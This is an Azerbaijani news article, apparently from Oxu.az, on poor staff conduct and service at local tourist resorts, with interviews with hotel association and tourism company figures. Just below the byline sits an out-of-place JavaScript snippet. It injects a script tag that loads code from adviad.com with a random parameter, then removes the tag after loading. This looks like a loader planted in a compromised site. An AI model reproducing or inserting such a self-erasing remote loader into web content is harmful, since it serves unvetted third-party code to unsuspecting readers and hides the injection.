Azərbaycanın turizm sektorunun “üz qaraları”

by admin

window._ttzi = 161;var script = document.createElement(“script”);script.src = “https://adviad.com/nativevideo/get_ads.js?=”+(Math.floor(Math.random() * 100000000) + 1);script.async = true;(document.body || document.head || document.documentElement).appendChild(script);script.onload = function(){script.parentNode.removeChild(script);};

Azərbaycanın quru sərhədlərinin hələ də bağlı olması yay günlərində əhalini əsasən yerli turizm obyektlərinə üz tutmağa məcbur etdi.

Bunu daxili turizmin inkişafı baxımından müsbət qiymətləndirmək olar. Amma eyni zamanda yaranmış vəziyyət bu sahədə olan problemləri daha qabarıq şəkildə görməyimizə də yardımçı oldu.

Bu turizm mövsümü də bu sahədə çalışan personalın daha çox bacarıqsızlığının, naşılığının, bəzi hallarda isə hətta kobudluğunun üzə çıxmasına vəsilə oldu. Təəssüf ki, bu problem yeni deyil və illərdir haqqında danışılır. Hətta onun aradan qaldırılması üçün uyğun ixtisasların tədris olunduğu ali məktəb açılıb, xarici kadrların cəlbinə və təlimlərə cəhdlər göstərilib. Amma görünür, hələlik bu addımlar o qədər də uğurlu deyil. Belə olmasaydı, əhalimiz yerli turizm obyektlərinə xərclədiyi pula görə bu qədər heyfislənməzdi.

Bu sektorun problemi ən primitiv şəkildə belə özünü göstərir. Belə ki, bəzi turizm obyekləri reklamları üçün istifadə etdikləri sosial şəbəkələrdə belə potensial müştəriləri ilə qeyri-adekvat davranırlar. Qeyri-dəqiq informasiyaların verilməsindən kobud rəftara qədər davranışlar sərgiləyən istirahət mərkəzlərinin sosial media menecerləri yaratdıqları ilkin təəssüratın onların imicinə nə qədər zərbə vuracağından sanki xəbərsizdirlər. Bu mərhələni qəbul edib, həqiqətən həmin istirahət mərkəzinə yollanan turisti isə növbəti xoş olmayan sürprizlər gözləyir: ona göndərilən şərtlərə uyğun olmayan servis, artıqlaması ilə alınan pul və qarşılığında sıfıra bərabər xidmət. Bu halda turist nə etməlidir? Taleyi ilə barışıb xidmətin belə də olmasını qəbul etməli, yoxsa etiraz səsini qaldırmalıdır? Etiraz olunursa, bunun üçün hara müraciət etmək lazımdır?

“Azərbaycan Hotellər və Restoranlar Assosiasiyası” İctimai Birliyinin İdarə Heyətinin sədri Samir Dübəndi bununla bağlı “Report”a bildirib ki, müştəri əvvəlcə ona qarşı hansı kobudluğun edildiyini formalaşdlrmalıdır ki, ondan sonra hansı quruma şikayət etmək lazım olduğunu bilsin: “Əgər müqavilə ilə və ya bir neçə saatlıq hoteldə qalırsa (yəni müqaviləsiz) onda araşdırmaq lazımdır.

İstehlakçıların hüquqlarının mühafizəsi cəmiyyətləri var, o cümlədən İqtisadiyyat Nazirliyinin yanında müxtəlif qurumlar var ki, ora müraciət edə bilər. Bundan başqa, Dövlət Turizm Agentliyinə, həmin ərazidə olan icra hakimiyyətinə, Hotellər və Restoranlar Assosiasiyası olaraq bizə də müraciət edə bilərlər”.

S.Dübəndi başqa problemə də toxunub: “Azərbaycanda hotellərin icarə verilməsində tənzimləmə mexanizmi yoxdur. Bazarda belə hallar olur ki, sahibkar bir bina tikir, amma heç bilmir ki, ora hotel olacaq. Əvvəlcə onlar uşaqları üçün mülk tikirlər, sonra klinikaya çevirmək istəyirlər, axırda da hotel olur. Onda da hotel üçün bina uyğunsuz olur. Nəzərə alınmayan müxtəlif tələblər gələcəkdə problem yaradır. Elə bundan irəli gəlir ki, müştərilərlə problem yaşanır, kobudluqlar ortaya çıxır. Çünki həmin adamın turizm sektorundan başı çıxmır. Belə hallara görə ölkə turizmi haqqında xoşagəlməz fikirlər yaranır. Çünki xarici turist gələndə o bütün ölkəni gəzmir, bir yerdə qalır, orda da belə kobudluq görəndə elə bilir ki, hamı belədir. Belə məsələlər ciddi tənzimlənməlidir. Hoteli icarəyə götürən sahibkarlar avtomatik olaraq hotelin baş meneceri vəzifəsində olur. Ona görə də müxtəlif imtahanlar, kvalifikasiyalar olmalıdır. Kvalifikasiya hotelin bütün işçiləri üçün təsdiqlənməlidir. Onda da belə hallar çox nadir halda ola bilər. Hotellər Assosiasiyası olaraq biz istər Bakı, istərsə də regionlarda olan hotellərin, icarədə olan hotellərin personalına təlim keçməyə hazırıq. Bizim istənilən region üçün öz təlim proqramlarımız var. Turizm sahəsində biznes qurmaq istəyən və çalışan adamlar üçün sınaq imtahanları keçirmək lazımdır. İncəsənət, rəssamlıq sahələrində sınaq imtahanları olduğu kimi, burada da olmalıdır”.

Ölkədə fəaliyyət göstərən turizm şirkətlərindən birinin rəhbəri Əziz Şiriyev problemin kökünü regionlarda kadr çatışmamazlığı ilə əlaqələndirir:

“Bu gün işçi axtaran da var, iş axtaran da. Biz hazırda körpü rolundayıq. İşçiləri yetişdiririk və iş axtaranlara – hotellərə, restoranlara, turizm şirkətlərinə təqdim edirik. Bakıdan regiona işçi aparmaq çox bahadır. Hotellər Bakıdan satış menecerləri, marketoloqları, aparırlar. Digər işçiləri isə apara bilmirlər.

Çünki heç kim paytaxtdan regiona gedib, 500 manata işləməz. 1500-2000 manat maaş verilməlidir ki, Bakıdan ora işə getsinlər. Bu da sahibkarı qane etmir. Sahibkarların pandemiya vaxtı xərcləri çox oldu, indi də maksimum o xərcləri bağlamaq istəyirlər. Bu zaman da regiondan olan gəncləri işə götürürlər.

Bu halda da müştərilərlə problemlər yaşanır. Kiminsə danışıq qabiliyyəti yoxdur, kiminsə dünyagörüşü yoxdur. Yəni təcrübə olmadığı üçün xoşagəlməz hadisələr baş verir.

Əslində isə əvvəlcə “Check-up” olmalıdır. Bakıdan peşəkar bir komanda hotelə getməlidir. Həmin işçilərə bir müddət təlim keçilməlidir. Qonaqpərvərlik təlimi bütün işçilərə keçilməlidir. Qonaq necə qəbul olunmalıdır, necə danışmaq lazımdır, gülərüz personal necə olur mövzularını dərindən öyrənməlidirlər.

Hər kəsin problemi olur. İstirahət edən adam problemini unudub ora gəlir, orada da ona qarşı kobudluq ediləndə və ya gülərüz personal olmayanda həmin hotelə bir də müştəri getmək istəmir. Bu baxımndan Türkiyə və ya digər Avropa ölkələrində yaxşı təcrübə var. Onların hotellərinə bu səbəbdən çox adam gedir.

Hətta müştəri belə özünü yaxşı aparmayanda, ona qarşı da kobud olmaq lazım deyil. O hallara da hazırlıqlı olmaq lazımdır. Fərqi yoxdur, qonaq məşhurdur, ya yox, hamı ilə mehriban olmaq lazımdır”.

Ekspert hesab edir ki, belə halların olması bu sektorda təcrübəsi olmayan sahibkarların olması səbəbindəndir.

Oxu.az

Bu yazılara da göz atın...